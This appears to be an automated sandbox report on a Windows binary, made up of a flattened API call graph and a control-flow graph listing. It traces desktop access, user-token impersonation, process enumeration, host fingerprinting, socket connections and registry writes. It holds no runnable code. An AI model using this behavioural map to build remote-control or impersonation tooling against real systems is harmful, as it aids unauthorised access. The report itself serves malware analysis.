7ff7e5127220 _getdrive 8 API calls 23015->23017 23016->23013 23019 7ff7e5079e54 EnumServicesStatusA 23016->23019 23018 7ff7e507a017 23017->23018 23020 7ff7e5079fe1 _RunAllParam 23019->23020 23021 7ff7e5079e93 23019->23021 23020->23013 23021->23020 23022 7ff7e5079eac OpenServiceA 23021->23022 23022->23020 23023 7ff7e5079ecb QueryServiceConfigA 23022->23023 23024 7ff7e5079fc7 CloseServiceHandle 23023->23024 23025 7ff7e5079ee5 GetLastError 23023->23025 23024->23020 23024->23021 23025->23024 23026 7ff7e5079ef4 _RunAllParam 23025->23026 23026->23024 23027 7ff7e5079f08 QueryServiceConfigA 23026->23027 23028 7ff7e50729a0 81 API calls 23026->23028 23027->23026 23028->23026 23030 7ff7e5072a17 23029->23030 23034 7ff7e50729bd 23029->23034 23031 7ff7e5072a29 23030->23031 23048 7ff7e51270b4 71 API calls std::exception::exception 23030->23048 23036 7ff7e5072a42 23031->23036 23049 7ff7e5073050 81 API calls std::exception::exception 23031->23049 23034->23030 23035 7ff7e50729e6 23034->23035 23037 7ff7e5072d12 23035->23037 23050 7ff7e5127110 71 API calls std::exception::exception 23035->23050 23036->23012 23038 7ff7e5072d41 23037->23038 23039 7ff7e5072d22 23037->23039 23042 7ff7e5072d53 23038->23042 23053 7ff7e51270b4 71 API calls std::exception::exception 23038->23053 23051 7ff7e5072fb0 71 API calls 23039->23051 23047 7ff7e5072d3c 23042->23047 23054 7ff7e5073050 81 API calls std::exception::exception 23042->23054 23043 7ff7e5072d2f 23052 7ff7e5072fb0 71 API calls 23043->23052 23047->23012 23048->23031 23049->23036 23050->23037 23051->23043 23052->23047 23053->23042 23054->23047 23162 7ff7e507f700 280 API calls 2 library calls 23163 7ff7e5082d00 24 API calls 23164 7ff7e5093530 120 API calls 2 library calls 23166 7ff7e508a130 173 API calls 4 library calls 23167 7ff7e507ff30 11 API calls _getdrive 23172 7ff7e50a3523 92 API calls 2 library calls 23173 7ff7e5094003 227 API calls 2 library calls 23176 7ff7e5099150 89 API calls _RunAllParam 23177 7ff7e509d150 177 API calls 3 library calls 23178 7ff7e508e550 97 API calls 23180 7ff7e50c1550 110 API calls _RunAllParam 23182 7ff7e5076753 RegCloseKey 23183 7ff7e508d149 96 API calls _RunAllParam 23184 7ff7e5083d50 12 API calls _getdrive 23185 7ff7e5083550 14 API calls _getdrive 23186 7ff7e507a550 104 API calls _RunAllParam 23188 7ff7e5085550 99 API calls 4 library calls 23190 7ff7e50a6d40 165 API calls 4 library calls 23191 7ff7e50a5940 109 API calls 23192 7ff7e5089740 101 API calls 2 library calls 22455 7ff7e50dcd40 inet_addr 22456 7ff7e50dcdae htons connect 22455->22456 22457 7ff7e50dcd89 gethostbyname 22455->22457 22459 7ff7e50dcdd5 22456->22459 22461 7ff7e50dcda1 22456->22461 22458 7ff7e50dcd97 22457->22458 22457->22461 22458->22456 22458->22461 22464 7ff7e50dcf90 setsockopt 22459->22464 22462 7ff7e5127220 _getdrive 8 API calls 22461->22462 22463 7ff7e50dcded 22462->22463 22465 7ff7e50dd08a getsockname getpeername 22464->22465 22466 7ff7e50dcff9 setsockopt 22464->22466 22467 7ff7e50dd109 SetPerTcpConnectionEStats 22465->22467 22470 7ff7e50dd137 22465->22470 22468 7ff7e50dd022 WSAIoctl 22466->22468 22469 7ff7e50dd01d 22466->22469 22467->22470 22468->22465 22469->22465 22471 7ff7e5127220 _getdrive 8 API calls 22470->22471 22472 7ff7e50dd14e 22471->22472 22472->22461 23194 7ff7e5094003 217 API calls 2 library calls 23198 7ff7e5084970 97 API calls 2 library calls 23199 7ff7e5080b70 89 API calls 23200 7ff7e507ab70 95 API calls _RunAllParam 23201 7ff7e5073770 111 API calls 2 library calls 23202 7ff7e5082b5e 87 API calls 22487 7ff7e5095958 22488 7ff7e509596d 22487->22488 22489 7ff7e509597e EnterCriticalSection 22488->22489 22560 7ff7e509c2c0 22488->22560 22492 7ff7e50dd890 97 API calls 22489->22492 22493 7ff7e50959e2 22492->22493 22494 7ff7e5097b95 LeaveCriticalSection 22493->22494 22495 7ff7e5097b3d 22493->22495 22496 7ff7e5097afe FlushFileBuffers 22493->22496 22528 7ff7e5094003 22494->22528 22495->22494 22499 7ff7e5097b4e FlushFileBuffers 22495->22499 22601 7ff7e50ddfc0 CloseHandle 22496->22601 22602 7ff7e50ddfc0 CloseHandle 22499->22602 22501 7ff7e5097b2e 22501->22495 22502 7ff7e5097b7e 22502->22494 22504 7ff7e5097c81 Sleep 22505 7ff7e5097c95 22504->22505 22506 7ff7e5097ca6 FlushFileBuffers 22505->22506 22507 7ff7e5097cf7 22505->22507 22506->22507 22508 7ff7e5097ce6 CloseHandle 22506->22508 22509 7ff7e5097d08 FlushFileBuffers 22507->22509 22510 7ff7e5097d59 22507->22510 22508->22507 22509->22510 22511 7ff7e5097d48 CloseHandle 22509->22511 22604 7ff7e50da3b0 93 API calls 2 library calls 22510->22604 22511->22510 22514 7ff7e5097d62 22515 7ff7e5097d85 22514->22515 22605 7ff7e50a2170 16 API calls 22514->22605 22518 7ff7e5097dbc 22515->22518 22519 7ff7e5097d9d CloseDesktop 22515->22519 22516 7ff7e50a2220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 22526 7ff7e50940c8 22516->22526 22527 7ff7e5073730 _RunAllParam 89 API calls 22518->22527 22519->22518 22520 7ff7e5097da7 22519->22520 22521 7ff7e5073730 _RunAllParam 89 API calls 22520->22521 22521->22518 22523 7ff7e50931b0 27 API calls 22523->22526 22524 7ff7e5073730 89 API calls _RunAllParam 22524->22528 22525 7ff7e509c590 16 API calls 22525->22526 22526->22516 22526->22523 22526->22525 22526->22528 22531 7ff7e509419d GetTickCount 22526->22531 22538 7ff7e50dd890 97 API calls 22526->22538 22542 7ff7e50dd440 16 API calls 22526->22542 22546 7ff7e5097c72 22526->22546 22599 7ff7e50d95d0 EnterCriticalSection LeaveCriticalSection 22526->22599 22600 7ff7e509c6f0 18 API calls _RunAllParam 22526->22600 22529 7ff7e5097dfc GetModuleFileNameA 22527->22529 22528->22524 22528->22526 22532 7ff7e5073730 _RunAllParam 89 API calls 22528->22532 22528->22546 22549 7ff7e5097c47 CloseDesktop 22528->22549 22551 7ff7e50940bf CloseDesktop 22528->22551 22597 7ff7e50da5b0 98 API calls 2 library calls 22528->22597 22598 7ff7e50da3b0 93 API calls 2 library calls 22528->22598 22603 7ff7e509c4e0 93 API calls _RunAllParam 22528->22603 22533 7ff7e5097e15 22529->22533 22534 7ff7e5097e56 LoadLibraryA 22529->22534 22531->22526 22535 7ff7e5094075 OpenInputDesktop 22532->22535 22606 7ff7e512a140 70 API calls 3 library calls 22533->22606 22539 7ff7e5097e6b GetProcAddress 22534->22539 22540 7ff7e5097e9d 22534->22540 22535->22528 22536 7ff7e5097c54 22535->22536 22543 7ff7e5073730 _RunAllParam 89 API calls 22536->22543 22538->22526 22544 7ff7e5097e8f FreeLibrary 22539->22544 22553 7ff7e5097edd 22540->22553 22607 7ff7e508e580 97 API calls _RunAllParam 22540->22607 22541 7ff7e5097e26 22541->22534 22542->22526 22543->22546 22544->22540 22546->22504 22546->22505 22549->22536 22549->22546 22551->22526 22554 7ff7e5097fb2 22553->22554 22556 7ff7e5073730 _RunAllParam 89 API calls 22553->22556 22555 7ff7e5127220 _getdrive 8 API calls 22554->22555 22557 7ff7e5097ff0 22555->22557 22558 7ff7e5097f3e 22556->22558 22608 7ff7e50dab00 95 API calls _RunAllParam 22558->22608 22561 7ff7e5073730 _RunAllParam 89 API calls 22560->22561 22562 7ff7e509c309 EnterCriticalSection 22561->22562 22564 7ff7e509c348 22562->22564 22565 7ff7e509c338 LeaveCriticalSection 22562->22565 22567 7ff7e509c363 22564->22567 22568 7ff7e509c353 LeaveCriticalSection 22564->22568 22566 7ff7e509c4b7 22565->22566 22569 7ff7e5127220 _getdrive 8 API calls 22566->22569 22570 7ff7e509c37e 22567->22570 22571 7ff7e509c36e LeaveCriticalSection 22567->22571 22568->22566 22572 7ff7e509c4c7 22569->22572 22573 7ff7e5073730 _RunAllParam 89 API calls 22570->22573 22571->22566 22572->22489 22574 7ff7e509c393 22573->22574 22609 7ff7e50da130 73 API calls _getdrive 22574->22609 22576 7ff7e509c39a 22577 7ff7e509c39e 22576->22577 22578 7ff7e509c3cd 22576->22578 22579 7ff7e5073730 _RunAllParam 89 API calls 22577->22579 22610 7ff7e50da0c0 22578->22610 22581 7ff7e509c3bc LeaveCriticalSection 22579->22581 22581->22566 22582 7ff7e509c3d7 22583 7ff7e5073730 _RunAllParam 89 API calls 22582->22583 22584 7ff7e509c3f1 22583->22584 22585 7ff7e509c4a1 22584->22585 22613 7ff7e50d9bc0 LoadLibraryA 22584->22613 22586 7ff7e509c4a3 LeaveCriticalSection 22585->22586 22586->22566 22589 7ff7e509c480 22589->22586 22593 7ff7e509c491 timeGetTime 22589->22593 22590 7ff7e509c413 OpenProcess OpenProcessToken 22591 7ff7e509c446 ImpersonateLoggedOnUser 22590->22591 22592 7ff7e509c43d 22590->22592 22591->22592 22594 7ff7e509c46c CloseHandle CloseHandle 22591->22594 22595 7ff7e5073730 _RunAllParam 89 API calls 22592->22595 22593->22586 22594->22589 22596 7ff7e509c46a 22595->22596 22596->22594 22597->22528 22598->22528 22600->22526 22601->22501 22602->22502 22603->22528 22604->22514 22606->22541 22608->22554 22609->22576 22636 7ff7e50d9ef0 22610->22636 22612 7ff7e50da0d2 22612->22582 22614 7ff7e50d9c46 22613->22614 22615 7ff7e50d9c11 GetProcAddress GetProcAddress 22613->22615 22617 7ff7e50d9c49 GetSystemMetrics 22614->22617 22615->22614 22616 7ff7e50d9c40 22615->22616 22616->22617 22618 7ff7e50d9c80 CreateToolhelp32Snapshot 22617->22618 22619 7ff7e50d9c58 22617->22619 22621 7ff7e50d9c94 Process32First 22618->22621 22622 7ff7e50d9cb7 22618->22622 22619->22618 22620 7ff7e50d9c61 GetCurrentProcessId ProcessIdToSessionId 22619->22620 22620->22618 22623 7ff7e50d9cae CloseHandle 22621->22623 22628 7ff7e50d9cd0 22621->22628 22624 7ff7e50d9cc5 22622->22624 22625 7ff7e50d9cbc FreeLibrary 22622->22625 22623->22622 22627 7ff7e5127220 _getdrive 8 API calls 22624->22627 22625->22624 22630 7ff7e509c40f 22627->22630 22629 7ff7e50d9d5a Process32Next 22628->22629 22631 7ff7e50d9cf6 ProcessIdToSessionId 22628->22631 22632 7ff7e50d9d0b CloseHandle 22628->22632 22677 7ff7e5129700 22628->22677 22629->22628 22629->22632 22630->22589 22630->22590 22631->22628 22631->22629 22634 7ff7e50d9d26 22632->22634 22635 7ff7e50d9d1d FreeLibrary 22632->22635 22634->22624 22635->22634 22637 7ff7e50d9fdc 22636->22637 22638 7ff7e50d9f28 22636->22638 22640 7ff7e50d9f3b 22637->22640 22641 7ff7e50d9fec 22637->22641 22638->22637 22639 7ff7e50d9f30 GetProcessWindowStation 22638->22639 22639->22640 22642 7ff7e50d9f47 GetUserObjectInformationA GetLastError SetLastError 22639->22642 22647 7ff7e5073730 _RunAllParam 89 API calls 22640->22647 22665 7ff7e50d9d80 22641->22665 22645 7ff7e50d9fae 22642->22645 22646 7ff7e50d9f79 RevertToSelf 22642->22646 22645->22637 22651 7ff7e50d9fb7 22645->22651 22650 7ff7e5073730 _RunAllParam 89 API calls 22646->22650 22652 7ff7e50da0a9 22647->22652 22648 7ff7e50da000 GetUserNameA 22649 7ff7e50da06f 22648->22649 22653 7ff7e50da012 GetLastError 22648->22653 22655 7ff7e5073730 _RunAllParam 89 API calls 22649->22655 22654 7ff7e50d9fa1 22650->22654 22656 7ff7e5073730 _RunAllParam 89 API calls 22651->22656 22652->22612 22657 7ff7e50da044 GetLastError 22653->22657 22658 7ff7e50da01f 22653->22658 22654->22612 22659 7ff7e50da087 22655->22659 22660 7ff7e50d9fcc 22656->22660 22662 7ff7e5073730 _RunAllParam 89 API calls 22657->22662 22661 7ff7e5073730 _RunAllParam 89 API calls 22658->22661 22659->22612 22660->22612 22663 7ff7e50da034 22661->22663 22664 7ff7e50da062 22662->22664 22663->22612 22664->22612 22666 7ff7e50d9bc0 84 API calls 22665->22666 22667 7ff7e50d9da3 22666->22667 22668 7ff7e50d9dae OpenProcess OpenProcessToken 22667->22668 22669 7ff7e50d9da7 22667->22669 22670 7ff7e50d9de0 22668->22670 22671 7ff7e50d9de7 GetTokenInformation 22668->22671 22675 7ff7e5127220 _getdrive 8 API calls 22669->22675 22672 7ff7e50d9eb7 CloseHandle 22670->22672 22673 7ff7e50d9e16 LookupAccountSidA CloseHandle CloseHandle 22671->22673 22674 7ff7e50d9ea9 CloseHandle 22671->22674 22672->22669 22673->22669 22674->22672 22676 7ff7e50d9eda 22675->22676 22676->22648 22676->22649 22678 7ff7e5129731 22677->22678 22679 7ff7e512970d 22677->22679 22679->22678 22680 7ff7e512ffc8 _errno 70 API calls 22679->22680 22681 7ff7e5129717 22680->22681 22682 7ff7e51349d4 _invalid_parameter_noinfo 17 API calls 22681->22682 22683 7ff7e5129722 22682->22683 22683->22628 23203 7ff7e507d560 19 API calls 2 library calls 23204 7ff7e5080760 95 API calls free 23205 7ff7e509f790 96 API calls 2 library calls 23206 7ff7e5099390 121 API calls _RunAllParam 23208 7ff7e5088190 125 API calls _RunAllParam 23209 7ff7e507d790 11 API calls _getdrive 23211 7ff7e5074790 DeleteCriticalSection 23212 7ff7e509e780 97 API calls __wtomb_environ 23213 7ff7e508dd80 121 API calls 23214 7ff7e508bb80 122 API calls 2 library calls 23216 7ff7e507cf80 120 API calls 4 library calls 23217 7ff7e507f780 71 API calls __wtomb_environ 23219 7ff7e5094003 210 API calls 2 library calls 23220 7ff7e509a9b0 114 API calls _getdrive 23221 7ff7e509ebb0 71 API calls 23223 7ff7e50905b0 168 API calls _RunAllParam 23224 7ff7e50781ad 272 API calls 2 library calls 23226 7ff7e512e9bc 81 API calls 2 library calls 23227 7ff7e507ffb0 SetRectRgn SetRectRgn SetRectRgn 23228 7ff7e50a13a0 7 API calls 23229 7ff7e5089ba0 SetEvent Sleep Sleep 23232 7ff7e5094003 244 API calls 3 library calls 22318 7ff7e508f7d0 22319 7ff7e508f803 22318->22319 22320 7ff7e508f80d 22318->22320 22324 7ff7e50984f0 22319->22324 22327 7ff7e5107a70 6 API calls 22320->22327 22328 7ff7e5098590 22324->22328 22329 7ff7e5073730 _RunAllParam 89 API calls 22328->22329 22330 7ff7e50985d2 22329->22330 22331 7ff7e5098628 22330->22331 22332 7ff7e5098612 22330->22332 22333 7ff7e50985eb SendMessageA WaitForSingleObject 22330->22333 22334 7ff7e5098656 22331->22334 22335 7ff7e5128bf4 free 70 API calls 22331->22335 22332->22331 22358 7ff7e5084110 22332->22358 22333->22332 22336 7ff7e5073730 _RunAllParam 89 API calls 22334->22336 22337 7ff7e509867e _RunAllParam 22334->22337 22335->22334 22336->22337 22338 7ff7e5098757 22337->22338 22361 7ff7e50da220 FindWindowExA GetWindowThreadProcessId GetCurrentProcessId 22337->22361 22339 7ff7e5098768 22338->22339 22340 7ff7e5128bf4 free 70 API calls 22338->22340 22341 7ff7e5098779 22339->22341 22343 7ff7e5128bf4 free 70 API calls 22339->22343 22340->22339 22344 7ff7e50987b5 FreeLibrary 22341->22344 22348 7ff7e50987bc _RunAllParam 22341->22348 22343->22341 22344->22348 22345 7ff7e509873b 22345->22338 22346 7ff7e5098740 SendMessageA 22345->22346 22346->22338 22347 7ff7e50987ea DeleteObject 22349 7ff7e5128bf4 free 70 API calls 22347->22349 22348->22347 22350 7ff7e509881c DeleteObject 22349->22350 22351 7ff7e5128bf4 free 70 API calls 22350->22351 22352 7ff7e5098844 DeleteObject 22351->22352 22353 7ff7e5128bf4 free 70 API calls 22352->22353 22354 7ff7e509885d DeleteObject 22353->22354 22355 7ff7e5128bf4 free 70 API calls 22354->22355 22356 7ff7e5098876 22355->22356 22362 7ff7e5084140 22358->22362 22360 7ff7e5084124 22360->22331 22361->22345 22363 7ff7e508415c _RunAllParam 22362->22363 22364 7ff7e50841c6 22363->22364 22365 7ff7e50841b4 SendMessageA 22363->22365 22366 7ff7e50841d5 22364->22366 22367 7ff7e50841cf FreeLibrary 22364->22367 22365->22364 22366->22360 22367->22366 23233 7ff7e508b3d0 96 API calls 2 library calls 23234 7ff7e5094003 207 API calls 2 library calls 23235 7ff7e50c7bd0 21 API calls _getdrive 23236 7ff7e5094003 198 API calls 2 library calls 23237 7ff7e507f7d0 DeleteObject 23239 7ff7e5081bd0 FreeLibrary 23240 7ff7e50755d0 72 API calls sprintf 22473 7ff7e50dcbc0 22474 7ff7e50dcbdc socket 22473->22474 22475 7ff7e50dcbd7 22473->22475 22477 7ff7e50dcbf3 22474->22477 22478 7ff7e50dcbfb setsockopt 22474->22478 22482 7ff7e50dcc40 22475->22482 22478->22477 22479 7ff7e50dcc20 22478->22479 22480 7ff7e50dcf90 14 API calls 22479->22480 22481 7ff7e50dcc28 22480->22481 22483 7ff7e50dcc4f 22482->22483 22484 7ff7e50dcc87 22482->22484 22485 7ff7e5073730 _RunAllParam 89 API calls 22483->22485 22484->22474 22486 7ff7e50dcc67 shutdown closesocket 22485->22486 22486->22484 23244 7ff7e5094003 225 API calls 3 library calls 23246 7ff7e5094003 239 API calls 2 library calls 23247 7ff7e50755c0 LeaveCriticalSection 23248 7ff7e50747c0 12 API calls 23249 7ff7e509dbf0 13 API calls _RunAllParam 23250 7ff7e509ebf0 141 API calls 2 library calls 23251 7ff7e50779e9 75 API calls 3 library calls 23252 7ff7e50765f1 8 API calls _getdrive 23254 7ff7e50803f0 CombineRgn 23255 7ff7e50989e0 93 API calls _RunAllParam 23256 7ff7e508dde0 152 API calls 23260 7ff7e50809e0 82 API calls 2 library calls 23261 7ff7e5083be0 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey RegCloseKey 22368 7ff7e508e610 22369 7ff7e51292a4 __wtomb_environ 70 API calls 22368->22369 22370 7ff7e508e67f CreateRectRgn 22369->22370 22371 7ff7e51292a4 __wtomb_environ 70 API calls 22370->22371 22372 7ff7e508e6a3 CreateRectRgn 22371->22372 22373 7ff7e51292a4 __wtomb_environ 70 API calls 22372->22373 22374 7ff7e508e6c7 CreateRectRgn 22373->22374 22375 7ff7e5073730 _RunAllParam 89 API calls 22374->22375 22415 7ff7e508e70a _RunAllParam 22375->22415 22376 7ff7e508f70d 22377 7ff7e5073730 _RunAllParam 89 API calls 22376->22377 22378 7ff7e508f725 22377->22378 22380 7ff7e5073730 _RunAllParam 89 API calls 22378->22380 22379 7ff7e508e740 Sleep 22381 7ff7e508e752 22379->22381 22382 7ff7e508f741 DeleteObject 22380->22382 22381->22379 22381->22415 22422 7ff7e508f6b8 SetRectRgn 22381->22422 22424 7ff7e508f6da LeaveCriticalSection Sleep 22381->22424 22384 7ff7e5128bf4 free 70 API calls 22382->22384 22383 7ff7e508e773 EnterCriticalSection 22383->22415 22385 7ff7e508f760 DeleteObject 22384->22385 22386 7ff7e5128bf4 free 70 API calls 22385->22386 22388 7ff7e508f773 DeleteObject 22386->22388 22387 7ff7e508eab4 DeleteObject 22389 7ff7e5128bf4 free 70 API calls 22387->22389 22392 7ff7e5128bf4 free 70 API calls 22388->22392 22389->22415 22390 7ff7e508ead7 DeleteObject 22393 7ff7e5128bf4 free 70 API calls 22390->22393 22391 7ff7e508e8cb DeleteObject 22394 7ff7e5128bf4 free 70 API calls 22391->22394 22398 7ff7e508f786 22392->22398 22393->22415 22394->22415 22395 7ff7e508eafa DeleteObject 22401 7ff7e5128bf4 free 70 API calls 22395->22401 22396 7ff7e508e8ee DeleteObject 22402 7ff7e5128bf4 free 70 API calls 22396->22402 22399 7ff7e5127220 _getdrive 8 API calls 22398->22399 22405 7ff7e508f7a2 22399->22405 22401->22415 22402->22415 22403 7ff7e508e9a6 GetRgnBox 22403->22415 22404 7ff7e508e911 DeleteObject 22407 7ff7e5128bf4 free 70 API calls 22404->22407 22406 7ff7e508e7e6 GetRgnBox 22406->22415 22407->22415 22408 7ff7e508f704 LeaveCriticalSection 22408->22376 22409 7ff7e51075c0 104 API calls 22409->22415 22410 7ff7e5107400 97 API calls 22410->22415 22412 7ff7e508e9f3 GetRgnBox 22412->22415 22414 7ff7e508e833 GetRgnBox 22414->22415 22415->22376 22415->22379 22415->22381 22415->22383 22415->22387 22415->22390 22415->22391 22415->22395 22415->22396 22415->22404 22415->22408 22415->22409 22415->22410 22416 7ff7e50dd440 16 API calls 22415->22416 22417 7ff7e51292a4 __wtomb_environ 70 API calls 22415->22417 22415->22422 22428 7ff7e51292a4 __wtomb_environ 70 API calls 22415->22428 22430 7ff7e508f60b GetTickCount 22415->22430 22432 7ff7e51292a4 __wtomb_environ 70 API calls 22415->22432 22433 7ff7e5073730 89 API calls _RunAllParam 22415->22433 22442 7ff7e50dd710 15 API calls 22415->22442 22443 7ff7e50dcc40 91 API calls 22415->22443 22445 7ff7e507f840 73 API calls __wtomb_environ 22415->22445 22446 7ff7e507f840 73 API calls __wtomb_environ 22415->22446 22447 7ff7e507f840 73 API calls __wtomb_environ 22415->22447 22448 7ff7e507f840 73 API calls __wtomb_environ 22415->22448 22449 7ff7e507f840 73 API calls __wtomb_environ 22415->22449 22450 7ff7e507f840 73 API calls __wtomb_environ 22415->22450 22452 7ff7e50dd600 14 API calls 22415->22452 22453 7ff7e50dded0 8 API calls 2 library calls 22415->22453 22454 7ff7e509a580 99 API calls _RunAllParam 22415->22454 22416->22415 22419 7ff7e508ebb3 CreateRectRgn CombineRgn 22417->22419 22427 7ff7e508ec05 22419->22427 22420 7ff7e508ea40 GetRgnBox 22420->22415 22422->22424 22424->22415 22426 7ff7e508f702 22424->22426 22425 7ff7e508e87c GetRgnBox 22425->22415 22426->22376 22429 7ff7e508ec20 SetEvent 22427->22429 22451 7ff7e5098e00 120 API calls 22427->22451 22431 7ff7e508efdf CreateRectRgn CombineRgn DeleteObject 22428->22431 22429->22427 22435 7ff7e50ddd90 11 API calls 22430->22435 22436 7ff7e5128bf4 free 70 API calls 22431->22436 22437 7ff7e508f120 CreateRectRgn CombineRgn DeleteObject 22432->22437 22433->22415 22435->22381 22436->22415 22440 7ff7e5128bf4 free 70 API calls 22437->22440 22438 7ff7e508ec4a DeleteObject 22441 7ff7e5128bf4 free 70 API calls 22438->22441 22440->22415 22441->22415 22442->22415 22443->22415 22445->22406 22446->22414 22447->22425 22448->22403 22449->22412 22450->22420 22451->22438 22452->22415 22453->22415 22454->22415 23262 7ff7e508da10 82 API calls 2 library calls 23263 7ff7e50c7e10 20 API calls _getdrive 23267 7ff7e5080010 74 API calls free 23268 7ff7e5083210 18 API calls _getdrive 23270 7ff7e5084c10 137 API calls 4 library calls 23272 7ff7e50a3600 9 API calls _getdrive 23273 7ff7e50a5000 71 API calls free 23276 7ff7e5085203 16 API calls _getdrive 23278 7ff7e5080e00 82 API calls 3 library calls 23279 7ff7e507a600 100 API calls _RunAllParam 23282 7ff7e5071000 70 API calls free 23284 7ff7e5074200 121 API calls 2 library calls

                                                                      Executed Functions

                                                                      Function 00007FF7E50936D0 Relevance: 98.9, APIs: 31, Strings: 25, Instructions: 895librarythreadsleepCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 7ff7e50936d0-7ff7e50937b6 SetErrorMode call 7ff7e5073730 GetCurrentThreadId GetThreadDesktop call 7ff7e50933a0 8 7ff7e5097fb4-7ff7e5097fd3 0->8 9 7ff7e50937bc-7ff7e50937c8 call 7ff7e508f940 0->9 14 7ff7e5097fe1-7ff7e5098010 call 7ff7e5127220 8->14 12 7ff7e50939ea-7ff7e5093a33 call 7ff7e5073730 9->12 13 7ff7e50937ce-7ff7e50937e0 9->13 26 7ff7e5097ef3-7ff7e5097f11 12->26 27 7ff7e5093a39-7ff7e5093abe call 7ff7e50dd170 call 7ff7e5073730 timeGetTime call 7ff7e50d5f30 12->27 16 7ff7e50937e2-7ff7e50937f3 13->16 17 7ff7e50937fe-7ff7e509380d 13->17 16->17 20 7ff7e50937f5-7ff7e50937fc 16->20 22 7ff7e5093814-7ff7e5093858 call 7ff7e512851c call 7ff7e51292a4 * 2 call 7ff7e50da320 17->22 20->22 42 7ff7e5093874-7ff7e50938ad 22->42 43 7ff7e509385a-7ff7e509385d 22->43 26->14 38 7ff7e5097f17-7ff7e5097f23 26->38 70 7ff7e5093ac0-7ff7e5093b11 EnterCriticalSection call 7ff7e508aed0 LeaveCriticalSection 27->70 71 7ff7e5093b17-7ff7e5093bea call 7ff7e50a4bc0 call 7ff7e5134a10 GetComputerNameA 27->71 38->14 39 7ff7e5097f29-7ff7e5097fb2 call 7ff7e5073730 call 7ff7e50dab00 38->39 39->14 42->14 60 7ff7e50938b3-7ff7e50938c8 42->60 46 7ff7e509385f-7ff7e5093862 call 7ff7e5128bf4 43->46 47 7ff7e5093867-7ff7e509386a 43->47 46->47 47->42 51 7ff7e509386c-7ff7e509386f call 7ff7e5128bf4 47->51 51->42 62 7ff7e5093905-7ff7e5093926 60->62 63 7ff7e50938ca 60->63 64 7ff7e5093932-7ff7e50939bd call 7ff7e5073730 call 7ff7e50da290 62->64 65 7ff7e5093928 62->65 68 7ff7e50938d0-7ff7e50938e4 SleepEx 63->68 112 7ff7e50939c2-7ff7e50939c4 64->112 65->64 68->14 72 7ff7e50938ea-7ff7e5093903 68->72 70->71 84 7ff7e5093c5c-7ff7e5093c7d 71->84 85 7ff7e5093bec-7ff7e5093c04 71->85 72->62 72->68 90 7ff7e5093c83-7ff7e5093c9c gethostname 84->90 88 7ff7e5093c41-7ff7e5093c55 call 7ff7e5128f48 85->88 89 7ff7e5093c06 85->89 88->90 103 7ff7e5093c57 88->103 92 7ff7e5093c10-7ff7e5093c3f call 7ff7e512a120 89->92 95 7ff7e5093caf-7ff7e5093cb6 call 7ff7e5093220 90->95 96 7ff7e5093c9e-7ff7e5093cad call 7ff7e51285e0 90->96 92->88 101 7ff7e5093cbb-7ff7e5093cd4 95->101 96->101 106 7ff7e5093d53-7ff7e5093d80 101->106 107 7ff7e5093cd6-7ff7e5093cdf 101->107 103->106 110 7ff7e5093da2-7ff7e5093dbf 106->110 111 7ff7e5093d82-7ff7e5093da0 106->111 107->106 109 7ff7e5093ce1-7ff7e5093ce3 107->109 109->106 113 7ff7e5093ce5-7ff7e5093d15 109->113 114 7ff7e5093dc2-7ff7e5093ec6 call 7ff7e50dd710 110->114 111->114 112->14 115 7ff7e50939ca-7ff7e50939e5 call 7ff7e5073730 112->115 116 7ff7e5093d20-7ff7e5093d2d 113->116 114->8 122 7ff7e5093ecc-7ff7e5093ed8 114->122 115->14 116->116 120 7ff7e5093d2f-7ff7e5093d50 116->120 120->106 122->8 123 7ff7e5093ede-7ff7e5093eef call 7ff7e50dd600 122->123 123->8 126 7ff7e5093ef5-7ff7e5093fff call 7ff7e5073730 EnterCriticalSection call 7ff7e51292a4 CreateRectRgn DeleteObject call 7ff7e5128bf4 LeaveCriticalSection call 7ff7e5107d90 123->126 139 7ff7e5094003-7ff7e5094016 126->139 141 7ff7e50940d1-7ff7e50940dd 139->141 142 7ff7e509401c-7ff7e5094023 call 7ff7e50da5b0 139->142 144 7ff7e50940df-7ff7e50940e2 141->144 145 7ff7e50940f7-7ff7e50940fc 141->145 142->141 152 7ff7e5094029-7ff7e5094045 call 7ff7e5073730 142->152 144->145 149 7ff7e50940e4-7ff7e50940f2 call 7ff7e50931b0 * 2 144->149 146 7ff7e5094134-7ff7e5094159 call 7ff7e50a2220 145->146 147 7ff7e50940fe-7ff7e509412f call 7ff7e50a2220 call 7ff7e50d95d0 145->147 159 7ff7e509415f-7ff7e509418f call 7ff7e509c590 146->159 160 7ff7e50941ee-7ff7e50941fa 146->160 147->146 149->145 152->141 167 7ff7e509404b-7ff7e5094094 call 7ff7e5073730 * 2 OpenInputDesktop 152->167 179 7ff7e5094191-7ff7e509419b 159->179 180 7ff7e50941e4-7ff7e50941e9 159->180 163 7ff7e50941fc-7ff7e5094203 160->163 164 7ff7e509421d-7ff7e5094225 160->164 163->164 169 7ff7e5094205-7ff7e5094218 call 7ff7e509c590 163->169 170 7ff7e5094227-7ff7e5094253 164->170 171 7ff7e509426d-7ff7e5094270 164->171 195 7ff7e5097c66 167->195 196 7ff7e509409a-7ff7e50940b0 call 7ff7e5073730 call 7ff7e50da3b0 167->196 169->164 175 7ff7e5094255-7ff7e5094263 call 7ff7e50dd440 170->175 176 7ff7e5094268 170->176 177 7ff7e5094272-7ff7e509427f call 7ff7e509c6f0 171->177 178 7ff7e5094284-7ff7e5094286 171->178 175->176 176->171 177->178 186 7ff7e50942c6-7ff7e50942db 178->186 187 7ff7e5094288-7ff7e50942a4 178->187 179->180 184 7ff7e509419d-7ff7e50941bd GetTickCount 179->184 180->160 184->180 193 7ff7e50941bf-7ff7e50941cf 184->193 190 7ff7e50942dd-7ff7e50942e1 186->190 191 7ff7e509431e-7ff7e5094337 call 7ff7e50dd890 186->191 188 7ff7e50942b6-7ff7e50942c1 187->188 189 7ff7e50942a6-7ff7e50942b1 call 7ff7e50dd440 187->189 188->186 189->188 190->191 198 7ff7e50942e3-7ff7e50942f8 190->198 208 7ff7e5097c78-7ff7e5097c7f 191->208 209 7ff7e509433d-7ff7e5094347 191->209 193->180 200 7ff7e50941d1-7ff7e50941df call 7ff7e50dd440 193->200 202 7ff7e5097c6d call 7ff7e5073730 195->202 223 7ff7e50940b6-7ff7e50940bd 196->223 224 7ff7e5097c47-7ff7e5097c52 CloseDesktop 196->224 198->191 215 7ff7e50942fa-7ff7e5094313 call 7ff7e50dd890 198->215 200->180 216 7ff7e5097c72 202->216 212 